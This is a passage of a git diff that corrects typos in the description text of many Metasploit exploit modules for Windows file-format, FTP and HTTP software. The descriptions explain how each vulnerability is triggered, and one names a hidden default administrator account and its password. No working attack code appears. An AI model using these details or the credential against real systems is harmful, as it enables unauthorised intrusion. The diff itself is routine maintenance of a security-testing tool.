MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Visual Basic VBP Buffer Overflow', 'Description' => %q{ - This module exploits a stack oveflow in Microsoft Visual + This module exploits a stack overflow in Microsoft Visual Basic 6.0. When a specially crafted vbp file containing a long reference line, an attacker may be able to execute arbitrary code. diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index 4d9e5cef47..5b77143ba6 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -41,8 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a drawing in Microsoft Office, and how it gets calculated with user-controlled inputs, and stored in the EAX register. The 32-bit register will run out of storage space to - represent the large vlaue, which ends up being 0, but it still gets pushed as a - dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a + represent the large value, which ends up being 0, but it still gets pushed as a + dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a chunk anyway with size 0, and the address of this chunk is used as the destination buffer of a memcpy function, where the source buffer is the EXIF data (an extended image format supported by TIFF), and is also user-controlled. A function pointer in the chunk returned diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index 7b73294ad7..2470394aa7 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Orbit Downloader URL Unicode Conversion Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in Orbit Downloader. - The vulnerability is due to Orbit converting an URL ascii string to unicode - in a insecure way with MultiByteToWideChar. + The vulnerability is due to Orbit converting a URL ascii string to unicode + in an insecure way with MultiByteToWideChar. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the "File->Add Metalink..." option. }, diff --git a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb index 3f1268d324..1d628f94e8 100644 --- a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb +++ b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'PDF Shaper Buffer Overflow', 'Description' => %q{ PDF Shaper is prone to a security vulnerability when processing PDF files. - The vulnerability appear when we use Convert PDF to Image and use a specially - crafted PDF file. This module has been tested successfully on Win Xp, Win 7, + The vulnerability appears when we use Convert PDF to Image and use a specially + crafted PDF file. This module has been tested successfully on Win XP, Win 7, Win 8, Win 10. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb index f9109ee076..41f46b13aa 100644 --- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb +++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability - occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\". + occurs opening malformed Settings.ini file e.g. "C:\Program Files\Total Video Player\". This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index b4906989b6..90ac34302f 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use. - NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a + NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a victim user to 'double click' the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP. }, diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index 0c5cf632e8..806c8bc757 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in the Win32AddConnection - function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are + function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are reportedly affected. This vulnerability is only present in Win32 builds of VLC. diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index 069d0c259f..dd0167afe8 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'VUPlayer CUE Buffer Overflow', 'Description' => %q{ - This module exploits a stack over flow in VUPlayer <= 2.49. When - the application is used to open a specially crafted cue file, an buffer is overwritten allowing + This module exploits a stack based overflow in VUPlayer <= 2.49. When + the application is used to open a specially crafted cue file, a buffer is overwritten allowing for the execution of arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb index de294f91d3..de79640252 100644 --- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb +++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb @@ -15,9 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, - where memmove is used with in a insecure way with user controlled data. + where memmove is used in an insecure way with user controlled data. - To exploit the vulnerability the attacker must convince the attacker to install the + To exploit the vulnerability the attacker must convince the victim to install the generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb index c6fff6e62f..c8e9bee1a8 100644 --- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 - by generating an malicious file.) + by generating a malicious file. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index 730fb7d347..39b8b166cf 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Zinf. + PLS file within a browser, when the PLS extension is registered to Zinf. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index c0cf7abc37..d20f38a6dd 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability', 'Description' => %q{ This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially - crafted format string specifier as a username. The crafted username is sent to to the server to + crafted format string specifier as a username. The crafted username is sent to the server to overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code. The SEH exit function is preferred so that the administrators are not left with an unhandled diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index 4815eac563..4be8f558fe 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote PASS command. This may allow a remote attacker to cause a buffer overflow, resulting in a denial of service or allow the execution of arbitrary code. - FreeFTPd must have an account set to authorization anonymous user account. + freeFTPd must have an account set to authorization anonymous user account. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 46528829a6..590eabf90b 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'FTPShell 5.1 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets - triggered when the ftp clients tries to process an overly response to a PWD command. - This will overwrite the saved EIP and structured exception handler. + triggered when the ftp client tries to process an overly long response to a PWD + command. This will overwrite the saved EIP and structured exception handler. }, 'Author' => [ diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index b866d5d4a1..10d42e2050 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTTPDX tolog() Function Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in HTTPDX FTP server. - By sending an specially crafted FTP command containing format specifiers, an + By sending a specially crafted FTP command containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb index 8b091a6b9a..62b21be60f 100644 --- a/modules/exploits/windows/ftp/pcman_put.rb +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous - credientials are enabled. + credentials are enabled. }, 'Author' => [ diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index a34ac6221e..2ab92a7b0f 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerability that is triggered when processing a sufficiently long filename during a FTP LIST command resulting in overwriting the exception handler. Social engineering of executing a specially crafted - ftp file by double click will result in connecting to our malcious + ftp file by double click will result in connecting to our malicious server and perform arbitrary code execution which allows the attacker to gain the same rights as the user running ScriptFTP. This vulnerability affects versions 3.3 and earlier. diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index a0544f319d..503b5f12cf 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the Seagull FTP client that gets - triggered when the ftp clients processes a response to a LIST command. If the + triggered when the ftp client processes a response to a LIST command. If the response contains an overly long file/folder name, a buffer overflow occurs, overwriting a structured exception handler. }, diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index f7f5fa6061..d48f9e4942 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Vermillion FTP Daemon PORT Command Memory Corruption', 'Description' => %q{ This module exploits an out-of-bounds array access in the Arcane Software - Vermillion FTP server. By sending an specially crafted FTP PORT command, + Vermillion FTP server. By sending a specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote Processing is done using a source ptr (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments - the the destination pointer. If an ascii digit [0-9] is encountered, the + the destination pointer. If an ascii digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 4751f4b74e..a2c328e275 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in Xlink FTP Client 32 Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. - When a overly long FTP server response is recieved by a client, + When an overly long FTP server response is received by a client, arbitrary code may be executed. }, 'Author' => [ 'MC' ], diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index d87637f8dd..17278ba87a 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a - long JSESSION cookie value can lead to arbirtary code execution. + long JSESSION cookie value can lead to arbitrary code execution. }, 'Author' => 'pusscat', 'References' => diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index dfe079ce46..33b54389da 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in HP AutoPass License Server. It abuses two weaknesses in order to get its objective. First, the AutoPass application doesn't enforce - authentication in the CommunicationServlet component. Seond, it's possible to abuse a + authentication in the CommunicationServlet component. Second, it's possible to abuse a directory traversal when uploading files thorough the same component, allowing to upload an arbitrary payload embedded in a JSP. The module has been tested successfully on HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50. diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index c5fe0e7c3e..549a377fdb 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated - file uploads and handling zip contents in a insecure way. Combining both weaknesses + file uploads and handling zip contents in an insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. }, diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index e13fea3d96..4025f63965 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote 1. An "Accept-Language" header longer than 100 bytes 2. An "OVABverbose" URI variable set to "on", "true" or "1" - The vulnerability is related to "_WebSession::GetWebLocale()" .. + The vulnerability is related to "_WebSession::GetWebLocale()". NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload. }, diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index 898d0ca5e7..a9a0fc253c 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote address. The vulnerability is due to the use of the function "_OVConcatPath" which finally - uses "strcat" in a insecure way. User controlled data is concatenated to a string + uses "strcat" in an insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index ddfbf25392..9fd6a6cd2d 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined - with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is + with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index 286bec091c..62ba2f732b 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. - The vulnerable code lies within the a function within "snmpviewer.exe" with a + The vulnerable code lies within a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 6839e47c99..97080de852 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code. Please note that this module only works - against a specific build (ie. NNM 7.53_01195) + against a specific build (i.e. NNM 7.53_01195) }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index ee3b876650..f357451095 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the - request size. The buffer being targetted is 16384 bytes in size. There are actually two + request size. The buffer being targeted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the "execvp_nc" function within "ov.dll" prior to diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 8533e86032..175c790ec0 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow", 'Description' => %q{ This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. - By sending a request continaing a cookie longer than 5120 bytes, an attacker can overflow + By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow a stack buffer and execute arbitrary code. The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote like the following: #0 ... - #1 sprintf_new(local_stack_buf, fmt, cooke); + #1 sprintf_new(local_stack_buf, fmt, cookie); #2 OvWwwDebug(" HTTP_COOKIE=%s\n", cookie); #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x); #4 sub_405ee0("nnm", "webappmon"); @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote is easily achieved by overwriting the saved return address or SEH frame. The original advisory detailed an attack vector using the "OvJavaLocale" cookie being - passed in a request ot "webappmon.exe". Further research shows that several different + passed in a request to "webappmon.exe". Further research shows that several different cookie values, as well as several different CGI applications, can be used. '}, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index 9760118941..63d1a92528 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the - com.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system - allowing the execution of arbitary code. + com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system + allowing the execution of arbitrary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0 }, diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index b509c49c96..24f401dc26 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. By creating a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), - which may result aribitrary remote code execution under the context of 'SYSTEM'. + which may result in arbitrary remote code execution under the context of 'SYSTEM'. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 645794b5c6..746a121ef7 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTTPDX tolog() Function Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in HTTPDX HTTP server. - By sending an specially crafted HTTP request containing format specifiers, an + By sending a specially crafted HTTP request containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index bc3ba93485..f66d395af2 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerable. The administration web page on port 18881 is vulnerable to a remote buffer overflow - attack. By sending an long character string in the password field, both the structured + attack. By sending a long character string in the password field, both the structured exception handler and the saved extended instruction pointer are over written, allowing an attacker to gain control of the application and the underlying operating system remotely. diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 2b08f0b2f8..f7c5ee3a5d 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a remote buffer overflow in the MailEnable web service. The vulnerability is triggered when a large value is placed into the Authorization - header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and + header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and MailEnable Professional versions prior to 1.55 are affected. }, 'Author' => 'David Maciejak ', diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index fa47aa5c65..ba31ebb651 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account - has a default password of "plugin" which can not be reset through the user interface. By + has a default password of "plugin" which cannot be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows. diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index 76bd9fdf3e..fbfbf9858a 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super( 'Name' => 'ManageEngine Applications Manager Authenticated Code Execution', 'Description' => %q{ - This module logs into the Manage Engine Appplications Manager to upload a + This module logs into the Manage Engine Applications Manager to upload a payload to the file system and a batch script that executes the payload. }, 'Author' => 'Jacob Giannantonio ', 'Platform' => 'win', diff --git a/modules/exploits/windows/http/octopusdeploy_deploy.rb b/modules/exploits/windows/http/octopusdeploy_deploy.rb index e95b94becf..bba2efb29f 100644 --- a/modules/exploits/windows/http/octopusdeploy_deploy.rb +++ b/modules/exploits/windows/http/octopusdeploy_deploy.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Octopus Deploy Authenticated Code Execution', 'Description' => %q{ This module can be used to execute a payload on an Octopus Deploy server given - valid credentials or an API key. The payload is execued as a powershell script step + valid credentials or an API key. The payload is executed as a powershell script step on the Octopus Deploy server during a deployment. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index 97eb75ca15..01c368907f 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote root. If a new Domain has been used to deploy the Oracle application, the Windows Management Instrumentation service can be used to execute arbitrary code. - Both techniques has been successfully tested on default installs of Oracle BTM + Both techniques have been successfully tested on default installs of Oracle BTM 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are provided, but the user can configure the traversal depth using the DEPTH option. }, diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index ab0e9270ce..b99da301e1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability', 'Description' => %q{ This module exploits an authentication bypass vulnerability - in login.php. In conjuction with the authentication bypass issue, + in login.php. In conjunction with the authentication bypass issue, the 'jlist' parameter in property_box.php can be used to execute arbitrary system commands. This module was tested against Oracle Secure Backup version 10.3.0.1.0 diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index 7adce23a2f..9225f81aea 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt - generally causes a thread to die whether sucessful or not. Therefore, in a default + generally causes a thread to die whether successful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index ca29fef445..a0c48c7bd0 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module can be used to 